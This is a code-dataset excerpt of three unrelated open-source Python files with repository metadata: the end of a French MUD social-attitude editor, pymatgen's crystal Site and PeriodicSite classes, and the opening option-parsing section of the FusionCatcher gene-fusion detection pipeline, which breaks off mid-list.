n'apparaîtront pas ici. """ from primaires.interpreteur.editeur import Editeur from primaires.communication.attitude import STATUTS class EdtSocedit(Editeur): """Classe définissant l'éditeur d'attitude 'socedit'. """ nom = "socedit" def __init__(self, personnage, objet, attribut=None): """Constructeur de l'éditeur""" if personnage: instance_connexion = personnage.instance_connexion else: instance_connexion = None Editeur.__init__(self, instance_connexion, objet, attribut) self.personnage = personnage self.ajouter_option("q", self.opt_quitter) self.ajouter_option("aim", self.opt_aim) self.ajouter_option("aif", self.opt_aif) self.ajouter_option("oim", self.opt_oim) self.ajouter_option("oif", self.opt_oif) self.ajouter_option("adm", self.opt_adm) self.ajouter_option("adf", self.opt_adf) self.ajouter_option("idm", self.opt_idm) self.ajouter_option("idf", self.opt_idf) self.ajouter_option("odm", self.opt_odm) self.ajouter_option("odf", self.opt_odf) def __getnewargs__(self): return (None, None) def accueil(self): """Méthode d'accueil de l'éditeur""" attitude = self.objet msg = "| |tit|Edition de l'attitude {}|ff|".format( attitude.cle).ljust(87) + "|\n" msg += self.opts.separateur + "\n" msg += \ "Utilisez une des options pour paramétrer l'attitude.\n" \ "Statut actuel de l'attitude : |rg|" + \ STATUTS[attitude.statut] + "|ff|\n" \ "Clé (commande entrée par le joueur) : |cmd|" + \ attitude.cle + "|ff|\n\n" \ "Options :" \ "\n - |cmd|/aim|ff|, |cmd|/aif|ff|, |cmd|/oim|ff|... : édite un " \ "paramètre de l'attitude" \ "\n - |cmd|/q|ff| : permet de quitter l'éditeur\n\n" msg += "AIM (Acteur Indépendant Masculin) :\n |vr|" msg += attitude.independant["aim"] or \ "|grf|Vous vous faites tout petit." msg += "|ff|\nAIF (Acteur Indépendant Féminin) :\n |vr|" msg += attitude.independant["aif"] or \ "|grf|Vous vous faites toute petite." msg += "|ff|\nOIM (Observateur Indépendant Masculin) :\n |vr|" msg += attitude.independant["oim"] or \ "|grf||acteur| se fait tout petit." msg += "|ff|\nOIF (Observateur Indépendant Féminin) :\n |vr|" msg += attitude.independant["oif"] or \ "|grf||acteur| se fait toute petite." msg += "|ff|\nADM (Acteur Dépendant Masculin) :\n |vr|" msg += attitude.dependant["adm"] or \ "|grf|Vous vous faites tout petit devant |cible|." msg += "|ff|\nADF (Acteur Dépendant Féminin) :\n |vr|" msg += attitude.dependant["adf"] or \ "|grf|Vous vous faites toute petite devant |cible|." msg += "|ff|\nIDM (Interlocuteur Dépendant Masculin) :\n |vr|" msg += attitude.dependant["idm"] or \ "|grf||acteur| se fait tout petit devant vous." msg += "|ff|\nIDF (Interlocuteur Dépendant Féminin) :\n |vr|" msg += attitude.dependant["idf"] or \ "|grf||acteur| se fait toute petite devant vous." msg += "|ff|\nODM (Observateur Dépendant Masculin) :\n |vr|" msg += attitude.dependant["odm"] or \ "|grf||acteur| se fait tout petit devant |cible|." msg += "|ff|\nODF (Observateur Dépendant Féminin) :\n |vr|" msg += attitude.dependant["odf"] or \ "|grf||acteur| se fait toute petite devant |cible|." return msg + "|ff|" def opt_quitter(self, arguments): """Option quitter""" self.fermer() self.pere.envoyer("Fermeture de l'éditeur.") def opt_aim(self, arguments): self.objet.independant["aim"] = arguments self.actualiser() def opt_aif(self, arguments): self.objet.independant["aif"] = arguments self.actualiser() def opt_oim(self, arguments): self.objet.independant["oim"] = arguments self.actualiser() def opt_oif(self, arguments): self.objet.independant["oif"] = arguments self.actualiser() def opt_adm(self, arguments): self.objet.dependant["adm"] = arguments self.actualiser() def opt_adf(self, arguments): self.objet.dependant["adf"] = arguments self.actualiser() def opt_idm(self, arguments): self.objet.dependant["idm"] = arguments self.actualiser() def opt_idf(self, arguments): self.objet.dependant["idf"] = arguments self.actualiser() def opt_odm(self, arguments): self.objet.dependant["odm"] = arguments self.actualiser() def opt_odf(self, arguments): self.objet.dependant["odf"] = arguments self.actualiser()
vlegoff/tsunami
src/primaires/communication/editeurs/socedit/__init__.py
Python
bsd-3-clause
6,968
[ "ADF" ]
a7237db14125dfc52ab0ad0c50a56b6d7526891f9011625cec8f2a2373a40180
# coding: utf-8 from __future__ import division, unicode_literals """ This module defines classes representing non-periodic and periodic sites. """ __author__ = "Shyue Ping Ong" __copyright__ = "Copyright 2012, The Materials Project" __version__ = "0.1" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __date__ = "Jul 17, 2012" import collections import numpy as np from pymatgen.core.lattice import Lattice from pymatgen.core.periodic_table import Element, Specie, DummySpecie,\ get_el_sp from pymatgen.serializers.json_coders import PMGSONable from pymatgen.util.coord_utils import pbc_diff from pymatgen.core.composition import Composition class Site(collections.Mapping, collections.Hashable, PMGSONable): """ A generalized *non-periodic* site. This is essentially a composition at a point in space, with some optional properties associated with it. A Composition is used to represent the atoms and occupancy, which allows for disordered site representation. Coords are given in standard cartesian coordinates. """ position_atol = 1e-5 def __init__(self, atoms_n_occu, coords, properties=None): """ Create a *non-periodic* site. Args: atoms_n_occu: Species on the site. Can be: i. A sequence of element / specie specified either as string symbols, e.g. ["Li", "Fe2+", "P", ...] or atomic numbers, e.g., (3, 56, ...) or actual Element or Specie objects. ii. List of dict of elements/species and occupancies, e.g., [{"Fe" : 0.5, "Mn":0.5}, ...]. This allows the setup of disordered structures. coords: Cartesian coordinates of site. properties: Properties associated with the site as a dict, e.g. {"magmom": 5}. Defaults to None. """ if isinstance(atoms_n_occu, collections.Mapping): self._species = Composition(atoms_n_occu) totaloccu = self._species.num_atoms if totaloccu > 1 + Composition.amount_tolerance: raise ValueError("Species occupancies sum to more than 1!") self._is_ordered = totaloccu == 1 and len(self._species) == 1 else: self._species = Composition({get_el_sp(atoms_n_occu): 1}) self._is_ordered = True self._coords = coords self._properties = properties if properties else {} @property def properties(self): """ Returns a view of properties as a dict. """ return {k: v for k, v in self._properties.items()} def __getattr__(self, a): #overriding getattr doens't play nice with pickle, so we #can't use self._properties p = object.__getattribute__(self, '_properties') if a in p: return p[a] raise AttributeError(a) def distance(self, other): """ Get distance between two sites. Args: other: Other site. Returns: Distance (float) """ return np.linalg.norm(other.coords - self.coords) def distance_from_point(self, pt): """ Returns distance between the site and a point in space. Args: pt: Cartesian coordinates of point. Returns: Distance (float) """ return np.linalg.norm(np.array(pt) - self._coords) @property def species_string(self): """ String representation of species on the site. """ if self._is_ordered: return list(self._species.keys())[0].__str__() else: sorted_species = sorted(self._species.keys()) return ", ".join(["{}:{:.3f}".format(sp, self._species[sp]) for sp in sorted_species]) @property def species_and_occu(self): """ The species at the site, i.e., a Composition mapping type of element/species to occupancy. """ return self._species @property def specie(self): """ The Specie/Element at the site. Only works for ordered sites. Otherwise an AttributeError is raised. Use this property sparingly. Robust design should make use of the property species_and_occu instead. Raises: AttributeError if Site is not ordered. """ if not self._is_ordered: raise AttributeError("specie property only works for ordered " "sites!") return list(self._species.keys())[0] @property def coords(self): """ A copy of the cartesian coordinates of the site as a numpy array. """ return np.copy(self._coords) @property def is_ordered(self): """ True if site is an ordered site, i.e., with a single species with occupancy 1. """ return self._is_ordered @property def x(self): """ Cartesian x coordinate """ return self._coords[0] @property def y(self): """ Cartesian y coordinate """ return self._coords[1] @property def z(self): """ Cartesian z coordinate """ return self._coords[2] def __getitem__(self, el): """ Get the occupancy for element """ return self._species[el] def __eq__(self, other): """ Site is equal to another site if the species and occupancies are the same, and the coordinates are the same to some tolerance. numpy function `allclose` is used to determine if coordinates are close. """ if other is None: return False return self._species == other._species and \ np.allclose(self._coords, other._coords, atol=Site.position_atol) and \ self._properties == other._properties def __ne__(self, other): return not self.__eq__(other) def __hash__(self): """ Minimally effective hash function that just distinguishes between Sites with different elements. """ return sum([el.Z for el in self._species.keys()]) def __contains__(self, el): return el in self._species def __len__(self): return len(self._species) def __iter__(self): return self._species.__iter__() def __repr__(self): return "Site: {} ({:.4f}, {:.4f}, {:.4f})".format( self.species_string, *self._coords) def __lt__(self, other): """ Sets a default sort order for atomic species by electronegativity. Very useful for getting correct formulas. For example, FeO4PLi is automatically sorted in LiFePO4. """ if self._species.average_electroneg < other._species.average_electroneg: return True if self._species.average_electroneg > other._species.average_electroneg: return False if self.species_string < other.species_string: return True if self.species_string > other.species_string: return False return False def __str__(self): return "{} {}".format(self._coords, self.species_string) def as_dict(self): """ Json-serializable dict representation for Site. """ species_list = [] for spec, occu in self._species.items(): d = spec.as_dict() del d["@module"] del d["@class"] d["occu"] = occu species_list.append(d) return {"name": self.species_string, "species": species_list, "xyz": [float(c) for c in self._coords], "properties": self._properties, "@module": self.__class__.__module__, "@class": self.__class__.__name__} @classmethod def from_dict(cls, d): """ Create Site from dict representation """ atoms_n_occu = {} for sp_occu in d["species"]: if "oxidation_state" in sp_occu and Element.is_valid_symbol( sp_occu["element"]): sp = Specie.from_dict(sp_occu) elif "oxidation_state" in sp_occu: sp = DummySpecie.from_dict(sp_occu) else: sp = Element(sp_occu["element"]) atoms_n_occu[sp] = sp_occu["occu"] props = d.get("properties", None) return cls(atoms_n_occu, d["xyz"], properties=props) class PeriodicSite(Site, PMGSONable): """ Extension of generic Site object to periodic systems. PeriodicSite includes a lattice system. """ def __init__(self, atoms_n_occu, coords, lattice, to_unit_cell=False, coords_are_cartesian=False, properties=None): """ Create a periodic site. Args: atoms_n_occu: Species on the site. Can be: i. A sequence of element / specie specified either as string symbols, e.g. ["Li", "Fe2+", "P", ...] or atomic numbers, e.g., (3, 56, ...) or actual Element or Specie objects. ii. List of dict of elements/species and occupancies, e.g., [{"Fe" : 0.5, "Mn":0.5}, ...]. This allows the setup of disordered structures. coords (3x1 array or sequence): Coordinates of site as fractional or cartesian coordinates. lattice: Lattice associated with the site to_unit_cell (bool): Translates fractional coordinate to the basic unit cell, i.e. all fractional coordinates satisfy 0 <= a < 1. Defaults to False. coords_are_cartesian (bool): Set to True if you are providing cartesian coordinates. Defaults to False. properties (dict): Properties associated with the PeriodicSite, e.g., {"magmom":5}. Defaults to None. """ self._lattice = lattice if coords_are_cartesian: self._fcoords = self._lattice.get_fractional_coords(coords) c_coords = coords else: self._fcoords = coords c_coords = lattice.get_cartesian_coords(coords) if to_unit_cell: self._fcoords = np.mod(self._fcoords, 1) c_coords = lattice.get_cartesian_coords(self._fcoords) Site.__init__(self, atoms_n_occu, c_coords, properties) def __hash__(self): """ Minimally effective hash function that just distinguishes between Sites with different elements. """ return sum([el.Z for el in self._species.keys()]) @property def lattice(self): """ The lattice associated with the site. """ return self._lattice @property def frac_coords(self): """ A copy of the fractional coordinates of the site. """ return np.copy(self._fcoords) @property def a(self): """ Fractional a coordinate """ return self._fcoords[0] @property def b(self): """ Fractional b coordinate """ return self._fcoords[1] @property def c(self): """ Fractional c coordinate """ return self._fcoords[2] @property def to_unit_cell(self): """ Copy of PeriodicSite translated to the unit cell. """ return PeriodicSite(self._species, np.mod(self._fcoords, 1), self._lattice, properties=self._properties) def is_periodic_image(self, other, tolerance=1e-8, check_lattice=True): """ Returns True if sites are periodic images of each other. Args: other (PeriodicSite): Other site tolerance (float): Tolerance to compare fractional coordinates check_lattice (bool): Whether to check if the two sites have the same lattice. Returns: bool: True if sites are periodic images of each other. """ if check_lattice and self._lattice != other._lattice: return False if self._species != other._species: return False frac_diff = pbc_diff(self._fcoords, other._fcoords) return np.allclose(frac_diff, [0, 0, 0], atol=tolerance) def __eq__(self, other): return self._species == other._species and \ self._lattice == other._lattice and \ np.allclose(self._coords, other._coords, atol=Site.position_atol) and \ self._properties == other._properties def __ne__(self, other): return not self.__eq__(other) def distance_and_image_from_frac_coords(self, fcoords, jimage=None): """ Gets distance between site and a fractional coordinate assuming periodic boundary conditions. If the index jimage of two sites atom j is not specified it selects the j image nearest to the i atom and returns the distance and jimage indices in terms of lattice vector translations. If the index jimage of atom j is specified it returns the distance between the i atom and the specified jimage atom, the given jimage is also returned. Args: fcoords (3x1 array): fcoords to get distance from. jimage (3x1 array): Specific periodic image in terms of lattice translations, e.g., [1,0,0] implies to take periodic image that is one a-lattice vector away. If jimage == None, the image that is nearest to the site is found. Returns: (distance, jimage): distance and periodic lattice translations of the other site for which the distance applies. """ return self._lattice.get_distance_and_image(self._fcoords, fcoords, jimage=jimage) def distance_and_image(self, other, jimage=None): """ Gets distance and instance between two sites assuming periodic boundary conditions. If the index jimage of two sites atom j is not specified it selects the j image nearest to the i atom and returns the distance and jimage indices in terms of lattice vector translations. If the index jimage of atom j is specified it returns the distance between the ith atom and the specified jimage atom, the given jimage is also returned. Args: other (PeriodicSite): Other site to get distance from. jimage (3x1 array): Specific periodic image in terms of lattice translations, e.g., [1,0,0] implies to take periodic image that is one a-lattice vector away. If jimage == None, the image that is nearest to the site is found. Returns: (distance, jimage): distance and periodic lattice translations of the other site for which the distance applies. """ return self.distance_and_image_from_frac_coords(other._fcoords, jimage) def distance(self, other, jimage=None): """ Get distance between two sites assuming periodic boundary conditions. Args: other (PeriodicSite): Other site to get distance from. jimage (3x1 array): Specific periodic image in terms of lattice translations, e.g., [1,0,0] implies to take periodic image that is one a-lattice vector away. If jimage == None, the image that is nearest to the site is found. Returns: distance (float): Distance between the two sites """ return self.distance_and_image(other, jimage)[0] def __repr__(self): return "PeriodicSite: {} ({:.4f}, {:.4f}, {:.4f}) [{:.4f}, {:.4f}, " \ "{:.4f}]".format(self.species_string, self._coords[0], self._coords[1], self._coords[2], self._fcoords[0], self._fcoords[1], self._fcoords[2]) def as_dict(self): """ Json-serializable dict representation of PeriodicSite. """ species_list = [] for spec, occu in self._species.items(): d = spec.as_dict() del d["@module"] del d["@class"] d["occu"] = occu species_list.append(d) return {"label": self.species_string, "species": species_list, "xyz": [float(c) for c in self._coords], "abc": [float(c) for c in self._fcoords], "lattice": self._lattice.as_dict(), "properties": self._properties, "@module": self.__class__.__module__, "@class": self.__class__.__name__} @classmethod def from_dict(cls, d, lattice=None): """ Create PeriodicSite from dict representation. Args: d (dict): dict representation of PeriodicSite lattice: Optional lattice to override lattice specified in d. Useful for ensuring all sites in a structure share the same lattice. Returns: PeriodicSite """ atoms_n_occu = {} for sp_occu in d["species"]: if "oxidation_state" in sp_occu and Element.is_valid_symbol( sp_occu["element"]): sp = Specie.from_dict(sp_occu) elif "oxidation_state" in sp_occu: sp = DummySpecie.from_dict(sp_occu) else: sp = Element(sp_occu["element"]) atoms_n_occu[sp] = sp_occu["occu"] props = d.get("properties", None) lattice = lattice if lattice else Lattice.from_dict(d["lattice"]) return cls(atoms_n_occu, d["abc"], lattice, properties=props)
Dioptas/pymatgen
pymatgen/core/sites.py
Python
mit
18,056
[ "pymatgen" ]
2b9b39302e474fa717789a48e58ad3fc67e16faf45fecc6e787097cbcb360ee6
#!/usr/bin/env python # -*- coding: utf-8 -*- """ ============================================================================== FusionCatcher ============================================================================== FusionCatcher searches for novel somatic fusion genes in RNA-seq paired/single-end reads data produced by the Illumina Solexa platforms (for example: Solexa/HiSeq/NextSeq/MiSeq/MiniSeq). Author: Daniel Nicorici, Daniel.Nicorici@gmail.com Copyright (c) 2009-2021 Daniel Nicorici This file is part of FusionCatcher. FusionCatcher is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. FusionCatcher is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with FusionCatcher (see file 'COPYING.txt'). If not, see <http://www.gnu.org/licenses/>. By default, FusionCatcher is running BLAT aligner <http://users.soe.ucsc.edu/~kent/src/> but it offers also the option to disable all its scripts which make use of BLAT aligner if you choose explicitly to do so. BLAT's license does not allow to be used for commercial activities. If BLAT license does not allow to be used in your case then you may still use FusionCatcher by forcing not use the BLAT aligner by specifying the option '--skip-blat'. Fore more information regarding BLAT please see its license. Please, note that FusionCatcher does not require BLAT in order to find candidate fusion genes! """ import sys if ( sys.version_info>(3,0)): print "ERROR: Python 3 or newer detected! Python 2.X is needed! FIX: run '/some/python/2.7/python bootstrap.py" sys.exit(1) import os import struct import optparse import multiprocessing import subprocess import shutil import socket import locale import math import configuration # for sort in linux locale.setlocale(locale.LC_ALL, 'C') # bowtie seed bowtie_seed = "123456" def expand(*p): return os.path.abspath(os.path.expanduser(os.path.join(*p))) def islink(alink = None): """ Wrapper for: os.path.islink() """ f = False if alink: alink = alink[:-1] if alink.endswith(os.sep) else alink if os.path.islink(alink): f = True return f # get the path of this script pipeline_path = os.path.dirname(expand(sys.argv[0])) def outdir(*more_paths): global out_dir return os.path.join(out_dir,*more_paths) def datadir(*more_paths): global data_dir return os.path.join(data_dir,*more_paths) def tmpdir(*more_paths): global tmp_dir return os.path.join(tmp_dir,*more_paths) # make sure that a directory ends with path separator such that workflow can # recognize it as directory def adir(a_dir): if (not a_dir.endswith('\\')) and (not a_dir.endswith('/')): a_dir = a_dir + os.sep return a_dir # # # test if a command line option has been passed def is_optparse_provided(parser, dest): r = False sysargv = set([e.split("=")[0] for e in sys.argv[1:]]) for opt in parser._get_all_options(): if opt.dest == dest: if opt._long_opts and opt._long_opts[0] in sysargv: r = True break if opt._short_opts and opt._short_opts[0] in sys.argv: r = True break return r # if any (opt.dest == dest and (opt._long_opts[0] in sys.argv[1:] or (False if (not opt._short_opts) else opt._short_opts[0] in sys.argv[1:])) for opt in parser._get_all_options()): # return True # return False # # # def empty(a_file): f = True if (os.path.isfile(a_file) or islink(a_file)): s = os.path.getsize(a_file) if s < 100: d = [line for line in file(a_file,'r').readlines() if line.rstrip('\r\n')] if d: f = False else: f = False return f # # # def delete_file(some_file): some_file = some_file[:-1] if some_file.endswith(os.sep) else some_file if os.path.isfile(some_file) or islink(some_file): os.remove(some_file) # # # def memory(unit='default'): meminfo = {'MemTotal':0,'free':0,'used':0,'unit':'kB','total':0} if os.path.isfile('/proc/meminfo'): meminfo = [line.split() for line in file('/proc/meminfo').readlines()] t = meminfo[0][-1].strip() meminfo = dict([(line[0].rstrip(':'),int(line[1])) for line in meminfo]) # meminfo['MemTotal'] # e.g. 3921852 meminfo['free'] = meminfo['MemFree'] + meminfo['Buffers'] + meminfo['Cached'] meminfo['used'] = meminfo['MemTotal'] - meminfo['free'] meminfo['unit'] = t meminfo['total'] = meminfo['MemTotal'] if unit.upper() == 'GB' and t.upper() == 'KB': for k in meminfo.keys(): if k != 'unit': meminfo[k] = float(meminfo[k])/(1024*1024) meminfo['unit'] = 'GB' elif unit.upper() == 'MB' and t.upper() == 'KB': for k in meminfo.keys(): if k != 'unit': meminfo[k] = float(meminfo[k])/1024 meminfo['unit'] = 'MB' return meminfo # # # def info(ajob, fromfile, tofile , top = "\n\n\n", bottom = "\n\n\n" , temp_path = 'no'): if ajob.run(): aux = open(tofile,'a') top = str(top).splitlines() if type(top).__name__ == 'str' else top bottom = str(bottom).splitlines() if type(bottom).__name__ == 'str' else bottom ajob.write("APPENDING to file: '%s'.\n"% (tofile,)) for line in top: t = line.rstrip('\r\n')+'\n' aux.write(t) ajob.write(">%s" % (t,)) if fromfile: ajob.write(">from file: '%s'\n"% (fromfile,)) for line in file(fromfile,'r').readlines(): t = line.rstrip('\r\n')+'\n' aux.write(t) for line in bottom: t = line.rstrip('\r\n')+'\n' aux.write(t) ajob.write(">%s" % (t,)) aux.close() if fromfile: ajob.clean(fromfile,temp_path = temp_path) # # command line parsing # class MyOptionParser(optparse.OptionParser): def format_epilog(self, formatter): return self.epilog def is_known_extension(something): kx = ['fastq.gz','.fq.gz', '.fastq.bz2','.fq.bz2', '.fastq.zip','.fq.zip', '.fastq.xz','.fq.xz', '.fastq', '.fq', '.sra', '.bam'] sign = False for ekx in kx: if something.lower().endswith(ekx): sign = True break # skip readme files if (something.lower().startswith('readme') or something.lower().startswith('index.') or something.lower().startswith('checksum') or something.startswith('.') or something.lower().startswith('md5')): sign = False return sign usage = "%prog [options]" epilog = ("\n" + "Author: Daniel Nicorici \n" + "Email: Daniel.Nicorici@gmail.com \n" + "Copyright (c) 2009-2021, Daniel Nicorici \n " + "\n") description = ("FusionCatcher searches for novel and known somatic gene fusions in RNA-seq \n"+ "paired-end/single-end reads data produced by the Illumina sequencing \n"+ "platforms (like for example: Illumina HiSeq 2500, \n"+ "Illumina HiSeq 2000, Illumina HiSeq X, Illumina NextSeq 500, \n"+ "Illumina GAIIx, Illumina GAII, Illumina MiSeq, Illumina MiniSeq). \n") version = "%prog 1.33" if __name__ == "__main__": parser = MyOptionParser( usage = usage, epilog = epilog, description = description, version = version ) parser.add_option("--input","-i", action = "store", type = "string", dest = "input_filename", help = "The input file(s) or directory. The files should be "+ "in FASTQ or SRA format and may be or not compressed "+ "using gzip or zip. "+ "A list of files can be specified by given the "+ "filenames separated by comma. If a directory is given "+ "then it will analyze all the files found with the "+ "following extensions: .sra, "+ ".fastq, .fastq.zip, .fastq.gz, .fastq.bz2, fastq.xz, "+ ".fq, .fq.zip, .fq.gz, .fq.bz2, fz.xz, "+ ".txt, .txt.zip, .txt.gz, .txt.bz2 ." ) parser.add_option("--batch", action = "store_true", dest = "batch_mode", default = False, help = "If this is used then batch mode is used "+ "and the input specified using '--input' or '-i' is: "+ "(i) a tab-separated text file containing a each line such "+ "that there is one sample per line and first column are the "+ "FASTQ files' full pathnames/URLs, separated by commas, corresponding to the "+ "sample and an optional second column containing the name for the sample, or "+ "(ii) a input directory which contains a several subdirectories such that each "+ "subdirectory corresponds to only one sample and it contains all the FASTQ files "+ "corresponding to that sample. This is useful when several samples needs to be analyzed." ) parser.add_option("--single-end", action = "store_true", dest = "single_end", default = False, help = "If this is used then it is assumed that all the input reads are single-end reads "+ "which must be longer than 130 bp. "+ "Be default it is assumed that all input reads come from a paired-end reads." ) parser.add_option("--normal","-I", action = "store", type = "string", dest = "normal_matched_filename", help = "The input file(s) or directory containing the "+ "healthy normal-matched data. They should be given in the same "+ "format as for '--input'. In case that this option is used "+ "then the files/directory given to '--input' is considered "+ "to be from the sample of a patient with disease. This is optional." ) parser.add_option("--output","-o", action = "store", type = "string", dest = "output_directory", help = "The output directory where all the output files "+ "containing information about the found candidate fusion"+ "genes are written. Default is '%default'.") parser.add_option("--data","-d", action = "store", type = "string", dest = "data_directory", help = "The data directory where all the annotations files "+ "from Ensembl database are placed, e.g. 'data/'. "+ "This directory should be built using 'fusioncatcher-build'. "+ "If it is not used then it is read from configuration file "+ "specified with '--config' from 'data = ...' line.") parser.add_option("--tmp","-T", action = "store", type = "string", dest = "tmp_directory", default = "tmp", help = "The temporary directory where all the outputs files "+ "and directories will be written. Default is directory "+ "'%default' in the output directory specified with '--output'. ") parser.add_option("--threads","-p", action = "store", type = "int", dest = "processes", default = 0, help = "Number or processes/threads to be used for running SORT, Bowtie, "+ "BLAT, STAR, BOWTIE2 and other tools/programs. "+ "If it is 0 (as it is by default) then the number of processes/threads will be "+ "read first from 'fusioncatcher/etc/configuration.cfg' file. If even there it is still set to 0 then "+ "'min(number-of-CPUs-found,32)' processes will be used. Setting number of threads in 'fusioncatcher/etc/configuration.cfg' "+ "might be usefull in situations where one server is shared between several users and in order to limit FusionCatcher using all the CPUs/resources. "+ "Default is '%default'. ") parser.add_option("--config", action = "store", type = "string", dest = "configuration_filename", default = os.path.abspath(os.path.join(pipeline_path,"..","etc","configuration.cfg"))+','+os.path.abspath(os.path.join(pipeline_path,"configuration.cfg")), help = "Configuration file containing the paths to external "+ "tools (e.g. Bowtie, Blat, fastq-dump.) in case that "+ "they are not specified in PATH variable! "+ "Default is '%default'.") parser.add_option("--force-paths","-F", action = "store_true", dest = "force_paths", default = False, help = "If it is specified then all external tools and all Python tools "+ "will be executed by FusionCatcher by using their corresponding absolute paths, "+ "which will be obined from the fusioncatcher/bin/configuration.cfg file. "+ "By default no paths are specified when executing tools/scripts. "+ "Default is '%default'. ") parser.add_option("--no-update-check","-Z", action = "store_true", dest = "skip_update_check", default = False, help = "Skips the automatic routine that contacts the "+ "FusionCatcher server to check for a more recent version. "+ "Default is '%default'. ") parser.add_option("--5keep","-l", action = "store", type = "int", dest = "trim_3end_keep", default = 60, # 60 # 68 help = optparse.SUPPRESS_HELP # "This may be seen as seed length. For Bowtie aligner the reads "+ # "longer than '%default' will be trimmed from "+ # "their 3-end such that to become exactly '%default' bp long. "+ # "Reads shorter than '%default' will not be trimmed. " + # "The trimming priorities are '--5end','--3end','--5keep'. " + # "if several trimming options are used simultaneously. "+ # "The trimming is done by default only to the reads used "+ # "for BOWTIE aligner but not for BLAT/STAR/BOWTIE2 aligners. In order "+ # "to apply the trimming also the reads used by BLAT/STAR/BOWTIE2 aligners "+ # "option '--trim-psl' should be used! The trimming of reads for "+ # "BLAT/STAR/BOWTIE2 aligners is done using the option '--trim-psl-5keep'. "+ # "Default is '%default'." ) parser.add_option("--5keep2", action = "store", type = "int", dest = "trim_3end_keep2", default = 23, # 27 help = optparse.SUPPRESS_HELP # "After trimming using '--5keep' then a second round of trimming will "+ # "be done on unmapped reads to try to come with extra candidate fusion genes. "+ # "If this set to 0 then the trimming is disabled. " # "Default is '%default'." ) parser.add_option("--5end","-5", action = "store", type = "int", dest = "trim_5end", default = 0, help = optparse.SUPPRESS_HELP # "It trims all the reads from their 5-end with the "+ # "given size. "+ # "The trimming priorities are '--5end','--3end','--5keep'. " + # "if several trimming options are used simultaneously. "+ # "The trimming is done by default only to the reads used "+ # "for BOWTIE aligner but not for BLAT aligner. In order "+ # "to apply the trimming also the reads used by BLAT/STAR/BOWTIE2 aligners "+ # "option '--trim-psl' or '--trim-psl-5end' should be used! "+ # "Default is '%default'." ) parser.add_option("--3end","-3", action = "store", type = "int", dest = "trim_3end", default = 0, help = optparse.SUPPRESS_HELP # "It trims all the reads from their 3-end with the "+ # "given size. "+ # "The trimming priorities are '--5end','--3end','--5keep'. " + # "if several trimming options are used simultaneously. "+ # "The trimming is done by default only to the reads used "+ # "for BOWTIE aligner but not for BLAT aligner. In order "+ # "to apply the trimming also the reads used by BLAT/STAR/BOWTIE2 aligners "+ # "option '--trim-psl' should be used! "+ # "Default is '%default'." ) parser.add_option("--trim-psl", action = "store_true", dest = "trim_psl", default = False, help = optparse.SUPPRESS_HELP # "If it is specified then also the reads given as input "+ # "to BLAT/STAR/BOWTIE2 aligners are trimmed using the parameters given "+ # "by command line arguments '--5keep', '--5end', and '--3end'. "+ # "By default the trimming options "+ # "'--5keep', '--5end', '--3end' are trimming the reads only for "+ # "for the BOWTIE method but not when BLAT/STAR/BOWTIE2 are used. "+ # "Default is '%default'." ) parser.add_option("--trim-psl-5keep","-x", action = "store", type = "int", dest = "trim_psl_3end_keep", default = 82, # 80 help = optparse.SUPPRESS_HELP # "This may be seen as seed length. All reads given as input "+ # "to BLAT/STAR/BOWTIE2 aligners and which "+ # "are longer than '%default' will be trimmed from "+ # "their 3-end such that to become exactly '%default' bp long. "+ # "The reads given as input to Bowtie are not trimmed using this "+ # "option. It should be set to 0 if no trimming should be done "+ # "for BLAT/STAR/BOWTIE2. "+ # "Default is '%default'." ) parser.add_option("--trim-psl-5end", action = "store_true", dest = "trim_psl_5end", default = False, help = optparse.SUPPRESS_HELP # "If it is specified then also the reads given as input "+ # "to BLAT/STAR/BOWTIE2 aligners are trimmed using the parameters given "+ # "by command line argument '--5end'. "+ # "By default the trimming options "+ # "'--5keep', '--5end', '--3end' are trimming the reads only for "+ # "for the BOWTIE method but not when BLAT/STAR/BOWTIE2 are used. "+ # "Default is '%default'." ) parser.add_option("--trim-quality","-Q", action = "store", dest = "trim_quality", type = "int", default = 5, help = optparse.SUPPRESS_HELP # "The input reads will be trimmed from their 3'end "+ # "when the quality scores are below the given threshold, e.g. 5 for Q5. "+ # "Default is '%default'." ) parser.add_option("--trim-wiggle", action = "store", dest = "trim_wiggle", type = "int", default = 0, # it was 2 help = optparse.SUPPRESS_HELP # "The input reads will be trimmed during the alignment "+ # "from their 5' and 3' ends for filtering only purposes. "+ # "Default is '%default'." ) parser.add_option("--trimfq", action = "store", dest = "trimfq", type = "float", default = 1.00, help = optparse.SUPPRESS_HELP # "If this is set less than 1.00 the quality then the quality "+ # "trimming will be done using Phred algorithm in addition to "+ # "quality filtering which is already done by default. "+ # "For this the 'seqtk trimfq' tool is used and also the input "+ # "reads should have quality score in Sanger format. A recommended value "+ # "here for quality trimming is 0.05 (which is the default value of 'seqtk trimfq') or 0.10." ) parser.add_option("--skip-trim-multiple-5", action = "store_true", dest = "skip_trim_multiple_5", default = False, help = optparse.SUPPRESS_HELP # "It trims the 3' ends of the reads to multiple of 5, "+ # "for example 51bp to 50bp. It looks like for Illumina "+ # "reads the last 51 or 76 or 101 or 151 is really bad quality." ) parser.add_option("--skip-filter-low-entropy", action = "store_true", dest = "skip_filter_low_entropy", default = False, help = optparse.SUPPRESS_HELP # "It masks with Ns the low entropy regions in reads."+ ) parser.add_option("--skip-parsort", action = "store_true", dest = "skip_parsort", default = False, help = "It skips using GNU PARSORT and instead is using classic SORT." ) parser.add_option("--skip-fastqtk", action = "store_true", dest = "skip_fastqtk", default = False, help = "It skips using FASTQTK." ) mydefault = sorted([ "paralogs", "pair_pseudo_genes", "similar_reads", "ambiguous", "similar_symbols", "ensembl_fully_overlapping", "ensembl_same_strand_overlapping", # 'ucsc_fully_overlapping', # 'ucsc_same_strand_overlapping', 'refseq_fully_overlapping', 'refseq_same_strand_overlapping', "dist1000bp", "rrna", "trna", "mt", "mirna", "yrna", "7skrna", "snorna", "snrna", "cta", "ctb", "ctc", "ctd", "rp", "rp11", "banned", "healthy", "hla", "conjoing", "metazoa", "bodymap2", "hpa", "1000genomes", # "non_tumor_cells", "multi", "fragments", "removed"]) all_choices = sorted([ 'paralogs', 'adjacent', 'ambiguous', 'dist1000bp', 'chimer2', 'chimer4kb', 'chimer4pub', 'chimer4seq', 'cacg', 'cgp', 'duplicates', 'bodymap2', 'hpa', "1000genomes", 